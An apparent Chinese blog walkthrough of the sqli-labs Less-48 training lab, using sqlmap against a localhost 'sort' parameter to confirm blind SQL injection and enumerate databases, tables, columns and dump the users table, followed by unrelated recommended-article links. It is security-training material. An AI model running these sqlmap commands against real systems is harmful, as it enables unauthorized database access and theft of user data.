sqli-labs-Less-48

SQLI-LAPS 实验记录

Less-48

这一关是盲注,页面上没有任何反馈信息,所以我们采用sqlmap工具来帮助进行自动化注入。

首先我们在命令行中输入sqlmap命令:

sql 复制代码
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch

结果如图所示,有两种注入方式可选,布尔盲注和时间盲注,接下来我们继续采用sqlmap自动化注入。

sql 复制代码
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch --dbs

结果如图所示,页面返回数据库的名称,注入有效。


之后,我们可以继续使用sqlmap注入的方式,对表名、列名等内容进行注入。

  • 爆出表名:
php 复制代码
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security --tables
  • 爆出列名:
php 复制代码
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security -T users --columns
  • 爆出内容:
php 复制代码
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security -T users --dump
相关推荐
倔强的石头_8 小时前
《Kingbase护城河》——猎捕慢查询:执行计划的微观解析与索引调优实战
数据库
SelectDB10 小时前
Apache Doris Python UDF:让 SQL 直接调用 Python 生态,支撑 Agent 时代复杂业务逻辑
大数据·数据库·python
jiayou642 天前
KingbaseES 表级与列级加密完全指南
数据库·后端
GBASE2 天前
G术时刻 |GBase 8s数据库事务并发控制之封锁技术介绍(下)
数据库
xiezhr3 天前
逛GitHub发现了一款免费的带AI功能的数据库管理工具
数据库·ai编程·dba
唐青枫4 天前
MySQL JSON 实战详解:从存储、查询、更新到 JSON_TABLE 与索引
sql·mysql
吃糖的小孩4 天前
给 QQ AI 机器人设计“可控记忆”:会话摘要、手动长期记忆与角色卡边界
数据库
小满8784 天前
5.Mysql事务隔离级别与锁机制
mysql
笃行3504 天前
金仓数据库数据安全双防线:静态存储加密与传输加密实战
数据库
笃行3504 天前
金仓数据库物理备份实战:sys_rman 全流程演练与误覆盖抢救
数据库